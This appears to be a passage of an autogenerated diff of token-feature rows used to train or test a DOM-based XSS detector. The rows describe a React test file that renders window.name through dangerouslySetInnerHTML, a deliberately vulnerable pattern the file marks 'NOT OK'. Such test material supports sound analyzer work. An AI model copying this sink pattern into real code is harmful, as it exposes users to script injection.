autogenerated/Xss/DomBasedXss/react-use-state.js:8:1:12:1 | exceptional return of function setStateValue | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:8:1:12:1 | functio ... OT OK\\n} | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:8:1:12:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:8:1:12:1 | functio ... OT OK\\n} | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:8:1:12:1 | return of function setStateValue | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:8:1:12:1 | return of function setStateValue | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:8:1:12:1 | return of function setStateValue | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:8:1:12:1 | return of function setStateValue | enclosingFunctionName | setStateValue | +| autogenerated/Xss/DomBasedXss/react-use-state.js:8:1:12:1 | return of function setStateValue | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:8:10:8:22 | setStateValue | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:8:10:8:22 | setStateValue | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:8:10:8:22 | setStateValue | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:9:9:25 | [state, setState] | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:9:9:25 | [state, setState] | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:9:9:25 | [state, setState] | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:9:9:25 | [state, setState] | enclosingFunctionName | setStateValue | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:9:9:25 | [state, setState] | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:9:9:43 | [state, ... ('foo') | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:9:9:43 | [state, ... ('foo') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:9:9:43 | [state, ... ('foo') | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:9:9:43 | [state, ... ('foo') | enclosingFunctionName | setStateValue | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:9:9:43 | [state, ... ('foo') | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:9:9:43 | setState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:9:9:43 | setState | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:9:9:43 | setState | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:9:9:43 | setState | enclosingFunctionName | setStateValue | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:9:9:43 | setState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:9:9:43 | state | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:9:9:43 | state | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:9:9:43 | state | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:9:9:43 | state | enclosingFunctionName | setStateValue | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:9:9:43 | state | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:10:9:14 | state | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:10:9:14 | state | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:10:9:14 | state | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:10:9:14 | state | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:10:9:14 | state | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:10:9:14 | state | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:10:9:14 | state | enclosingFunctionName | setStateValue | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:10:9:14 | state | enclosingFunctionName | setStateValue | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:10:9:14 | state | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:10:9:14 | state | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:17:9:24 | setState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:17:9:24 | setState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:17:9:24 | setState | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:17:9:24 | setState | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:17:9:24 | setState | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:17:9:24 | setState | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:17:9:24 | setState | enclosingFunctionName | setStateValue | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:17:9:24 | setState | enclosingFunctionName | setStateValue | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:17:9:24 | setState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:17:9:24 | setState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:29:9:36 | useState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:29:9:36 | useState | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:29:9:36 | useState | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:29:9:36 | useState | enclosingFunctionName | setStateValue | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:29:9:36 | useState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:29:9:43 | exceptional return of useState('foo') | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:29:9:43 | exceptional return of useState('foo') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:29:9:43 | exceptional return of useState('foo') | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:29:9:43 | exceptional return of useState('foo') | enclosingFunctionName | setStateValue | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:29:9:43 | exceptional return of useState('foo') | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:29:9:43 | useState('foo') | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:29:9:43 | useState('foo') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:29:9:43 | useState('foo') | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:29:9:43 | useState('foo') | enclosingFunctionName | setStateValue | +| autogenerated/Xss/DomBasedXss/react-use-state.js:9:29:9:43 | useState('foo') | fileImports | react | | autogenerated/Xss/DomBasedXss/react-use-state.js:9:38:9:42 | 'foo' | CalleeFlexibleAccessPath | useState | | autogenerated/Xss/DomBasedXss/react-use-state.js:9:38:9:42 | 'foo' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/react-use-state.js:9:38:9:42 | 'foo' | calleeImports | react | @@ -14648,6 +106710,26 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/react-use-state.js:9:38:9:42 | 'foo' | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | | autogenerated/Xss/DomBasedXss/react-use-state.js:9:38:9:42 | 'foo' | enclosingFunctionName | setStateValue | | autogenerated/Xss/DomBasedXss/react-use-state.js:9:38:9:42 | 'foo' | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:10:5:10:12 | setState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:10:5:10:12 | setState | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:10:5:10:12 | setState | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:10:5:10:12 | setState | enclosingFunctionName | setStateValue | +| autogenerated/Xss/DomBasedXss/react-use-state.js:10:5:10:12 | setState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:10:5:10:25 | exceptional return of setStat ... w.name) | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:10:5:10:25 | exceptional return of setStat ... w.name) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:10:5:10:25 | exceptional return of setStat ... w.name) | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:10:5:10:25 | exceptional return of setStat ... w.name) | enclosingFunctionName | setStateValue | +| autogenerated/Xss/DomBasedXss/react-use-state.js:10:5:10:25 | exceptional return of setStat ... w.name) | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:10:5:10:25 | setStat ... w.name) | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:10:5:10:25 | setStat ... w.name) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:10:5:10:25 | setStat ... w.name) | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:10:5:10:25 | setStat ... w.name) | enclosingFunctionName | setStateValue | +| autogenerated/Xss/DomBasedXss/react-use-state.js:10:5:10:25 | setStat ... w.name) | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:10:14:10:19 | window | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:10:14:10:19 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:10:14:10:19 | window | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:10:14:10:19 | window | enclosingFunctionName | setStateValue | +| autogenerated/Xss/DomBasedXss/react-use-state.js:10:14:10:19 | window | fileImports | react | | autogenerated/Xss/DomBasedXss/react-use-state.js:10:14:10:24 | window.name | CalleeFlexibleAccessPath | setState | | autogenerated/Xss/DomBasedXss/react-use-state.js:10:14:10:24 | window.name | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/react-use-state.js:10:14:10:24 | window.name | calleeImports | react | @@ -14656,18 +106738,149 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/react-use-state.js:10:14:10:24 | window.name | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | | autogenerated/Xss/DomBasedXss/react-use-state.js:10:14:10:24 | window.name | enclosingFunctionName | setStateValue | | autogenerated/Xss/DomBasedXss/react-use-state.js:10:14:10:24 | window.name | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:10:21:10:24 | name | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:10:21:10:24 | name | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:10:21:10:24 | name | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:10:21:10:24 | name | enclosingFunctionName | setStateValue | +| autogenerated/Xss/DomBasedXss/react-use-state.js:10:21:10:24 | name | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:12:11:64 |
    | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:12:11:64 |
    | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:12:11:64 |
    | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:12:11:64 |
    | enclosingFunctionName | setStateValue | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:12:11:64 |
    | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:13:11:15 | div | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:13:11:15 | div | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:13:11:15 | div | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:13:11:15 | div | enclosingFunctionName | setStateValue | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:13:11:15 | div | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:17:11:39 | dangero ... nerHTML | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:17:11:39 | dangero ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:17:11:39 | dangero ... nerHTML | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:17:11:39 | dangero ... nerHTML | enclosingFunctionName | setStateValue | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:17:11:39 | dangero ... nerHTML | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:17:11:57 | dangero ... state}} | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:17:11:57 | dangero ... state}} | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:17:11:57 | dangero ... state}} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:17:11:57 | dangero ... state}} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:17:11:57 | dangero ... state}} | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:17:11:57 | dangero ... state}} | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:17:11:57 | dangero ... state}} | enclosingFunctionName | setStateValue | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:17:11:57 | dangero ... state}} | enclosingFunctionName | setStateValue | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:17:11:57 | dangero ... state}} | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:17:11:57 | dangero ... state}} | fileImports | react | | autogenerated/Xss/DomBasedXss/react-use-state.js:11:42:11:56 | {__html: state} | assignedToPropName | dangerouslySetInnerHTML | | autogenerated/Xss/DomBasedXss/react-use-state.js:11:42:11:56 | {__html: state} | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | | autogenerated/Xss/DomBasedXss/react-use-state.js:11:42:11:56 | {__html: state} | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/react-use-state.js:11:42:11:56 | {__html: state} | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | | autogenerated/Xss/DomBasedXss/react-use-state.js:11:42:11:56 | {__html: state} | enclosingFunctionName | setStateValue | | autogenerated/Xss/DomBasedXss/react-use-state.js:11:42:11:56 | {__html: state} | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:43:11:48 | __html | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:43:11:48 | __html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:43:11:48 | __html | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:43:11:48 | __html | enclosingFunctionName | setStateValue | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:43:11:48 | __html | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:43:11:55 | __html: state | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:43:11:55 | __html: state | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:43:11:55 | __html: state | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:43:11:55 | __html: state | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:43:11:55 | __html: state | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:43:11:55 | __html: state | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:43:11:55 | __html: state | enclosingFunctionName | setStateValue | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:43:11:55 | __html: state | enclosingFunctionName | setStateValue | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:43:11:55 | __html: state | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:11:43:11:55 | __html: state | fileImports | react | | autogenerated/Xss/DomBasedXss/react-use-state.js:11:51:11:55 | state | assignedToPropName | __html | | autogenerated/Xss/DomBasedXss/react-use-state.js:11:51:11:55 | state | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | | autogenerated/Xss/DomBasedXss/react-use-state.js:11:51:11:55 | state | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/react-use-state.js:11:51:11:55 | state | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | | autogenerated/Xss/DomBasedXss/react-use-state.js:11:51:11:55 | state | enclosingFunctionName | setStateValue | | autogenerated/Xss/DomBasedXss/react-use-state.js:11:51:11:55 | state | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:14:1:14:0 | this | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:14:1:14:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:14:1:14:0 | this | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:14:1:14:0 | this | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:14:1:14:0 | this | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:14:1:14:0 | useState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:14:1:14:0 | useState | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:14:1:14:0 | useState | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:14:1:14:0 | useState | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:14:1:14:0 | useState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:14:1:18:1 | 'arguments' object of function setStateValueLazy | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:14:1:18:1 | 'arguments' object of function setStateValueLazy | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:14:1:18:1 | 'arguments' object of function setStateValueLazy | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:14:1:18:1 | 'arguments' object of function setStateValueLazy | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:14:1:18:1 | 'arguments' object of function setStateValueLazy | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:14:1:18:1 | exceptional return of function setStateValueLazy | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:14:1:18:1 | exceptional return of function setStateValueLazy | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:14:1:18:1 | exceptional return of function setStateValueLazy | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:14:1:18:1 | exceptional return of function setStateValueLazy | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:14:1:18:1 | exceptional return of function setStateValueLazy | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:14:1:18:1 | functio ... OT OK\\n} | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:14:1:18:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:14:1:18:1 | functio ... OT OK\\n} | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:14:1:18:1 | return of function setStateValueLazy | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:14:1:18:1 | return of function setStateValueLazy | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:14:1:18:1 | return of function setStateValueLazy | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:14:1:18:1 | return of function setStateValueLazy | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:14:1:18:1 | return of function setStateValueLazy | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:14:10:14:26 | setStateValueLazy | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:14:10:14:26 | setStateValueLazy | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:14:10:14:26 | setStateValueLazy | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:9:15:25 | [state, setState] | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:9:15:25 | [state, setState] | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:9:15:25 | [state, setState] | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:9:15:25 | [state, setState] | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:9:15:25 | [state, setState] | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:9:15:43 | [state, ... ('foo') | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:9:15:43 | [state, ... ('foo') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:9:15:43 | [state, ... ('foo') | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:9:15:43 | [state, ... ('foo') | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:9:15:43 | [state, ... ('foo') | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:9:15:43 | setState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:9:15:43 | setState | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:9:15:43 | setState | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:9:15:43 | setState | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:9:15:43 | setState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:9:15:43 | state | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:9:15:43 | state | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:9:15:43 | state | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:9:15:43 | state | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:9:15:43 | state | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:10:15:14 | state | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:10:15:14 | state | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:10:15:14 | state | contextSurroundingFunctionParameters | | +| 